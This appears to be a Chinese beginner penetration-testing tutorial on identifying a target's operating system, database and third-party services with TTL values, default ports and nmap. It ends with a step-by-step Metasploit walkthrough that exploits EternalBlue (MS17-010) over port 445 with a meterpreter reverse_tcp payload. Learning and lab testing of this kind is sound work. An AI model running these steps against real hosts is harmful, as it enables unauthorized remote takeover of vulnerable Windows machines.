天天看點

06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

基礎入門-系統及資料庫等

前言:

除去搭建平台中間件,網站源碼外,容易受到攻擊的還有作業系統,資料庫,第三方軟體平台等,其中此類攻擊也能直接影響到Web或伺服器的安全,導緻網站或伺服器權限的擷取。

一、作業系統層面

識别作業系統常見方法

  1. 通過網站或通過掃描相關軟體識别

    大小寫對網頁都沒有影響,這種情況就可以認定為windows伺服器,因為windows伺服器不區分字尾大小寫。

06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

​ 這個網站對應的作業系統是linux伺服器

06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等
  1. 也可以用TTL來判斷伺服器系統,相鄰的值來判斷

    (但是不準确)當使用者修改了TTL值的時候,就會誤導我們的判斷

TTL:

  • WINDOWS NT/2000 TTL:128
  • WINDOWS 95/98 TTL:32
  • UNIX TTL:255
  • LINUX TTL:64
  • WIN7 TTL:64
  1. nmap判斷

文法:O大寫

也可以使用-A來同時啟用作業系統檢測和版本檢測。

nmap -O -A dhost
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

簡要兩者差別及識别意義

網站路徑、大小寫、檔案在兩個系統之間的适用性,相容性.

  • 可以幫助我們明确思路
  • 可以篩選掉不符合系統的情況

作業系統層面漏洞類型對應意義

漏洞類型的不同會造成利用這個漏洞時的條件

  • 覆寫面廣
  • 擷取的權限高
  • 危害性大

簡要作業系統層面漏洞影響範圍

利用漏洞去擷取權限或者對某些服務進行幹擾

二、資料庫層面

識别資料庫類型常見方法

  1. 通過網站識别資料庫,通過腳本連接配接的資料庫

    ASP+Access(windows) 端口:無

    PHP+Mysql 端口:3306

    ASPX+Mssql(windows) 端口:1433

    Jsp+Mssql,oracle 端口:1521

    Python+Mongodb 端口:27017

    伺服器端口

    • 關系型資料庫 --MySQL:3306 --SqlServer:1433 --Oracle:1521
    • NOSQL資料庫 --MongoDB:27017 --Redis:6379 --memcached:11211
    利用nmap端口掃描
  • 使用“-p” 選項 指定Nmap掃描特定的端口 例如掃描目标22端口。
nmap -p [端口] [ip]
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等
  • -O也可以識别出端口
    06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

…等

資料庫類型差別及識别意義

每個資料庫裡面的安全機制,寫法結構都有些許不一樣,同樣産生的漏洞也不一樣。

不同資料庫對應漏洞有差異

  • 資料庫的漏洞和類型相性很強
  • 不同資料庫漏洞爆發點不太一樣
  • 能确定資料庫類型、版本,會對滲透有很大幫助

資料庫常見漏洞類型及攻擊

  • 弱密碼登入資料庫…
  • sql注入

簡要資料庫層面漏洞影響範圍

得到網站管理者資料可登入背景,得到使用者資料能登入使用者資訊,進行修改,通過資料庫操作可進行漏洞攻擊,也可以擷取資料庫權限和網站權限。

三、第三方層面

為什麼要識别第三方平台或軟體

判斷有哪些第三方平台或軟體

  • 多層次判斷,不能僅限于端口掃描,根據不同的應用采取不同的方法。
  • – 端口掃描
  • – 特征比對

nmap判斷端口服務

nmap -sV -p 13337 <target ip> 

案例:
nmap -p 80 -sV 192.168.112.68 

這是一個Apache HTTP伺服器。
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

常見第三方平台或軟體漏洞類型及攻擊

  • – 可以提供額外的攻擊面-- 弱密碼

簡要第三方平台或軟體安全測試的範圍

除去正常WEB安全及APP安全測試外,類似伺服器單一或複雜的其他服務( 郵件,遊戲,負載均衡等),也可以作為安全測試目标,此類目标測試原則隻是少了WEB應用或其他安全問題。是以明确安全測試思路是很重要的!
           

端口掃描工具:wins nmap下載下傳位址

官網:https://nmap.org/

https://github.com/hellogoldsnakeman/masnmapscan-V1.0

四、案例示範:作業系統漏洞示範

利用:

端口445

Metasapoit工具-永恒之藍

步驟:

kali打開Msfconsole工具:

msfconsole
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

第一步:掃描子產品

輔助子產品是Metasploit的内置子產品

先利用search指令搜尋有哪些可用端口子產品

文法:
search portscan
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

第二部:選擇偵聽子產品

use exploit/multi/handler

//(開啟偵聽)
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

第三步:查詢漏洞

search ms17
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

第四步:使用漏洞

use    useexploit/windows/smb/ms17_010_eternalblue 
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

第五步:在偵聽子產品中加載payload攻擊子產品

set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcp
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

第六步:show options檢視是否配置完成

06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

第七步:置一下LHOST 和 RHOSTS

set lhost 【本機的ip】

set rhosts 【被攻擊方的ip】
           
06-各類系統了解及資料庫 /漏洞利用基礎入門-系統及資料庫等

第八步:run運作攻擊

run
           

結果成功拿到對方目錄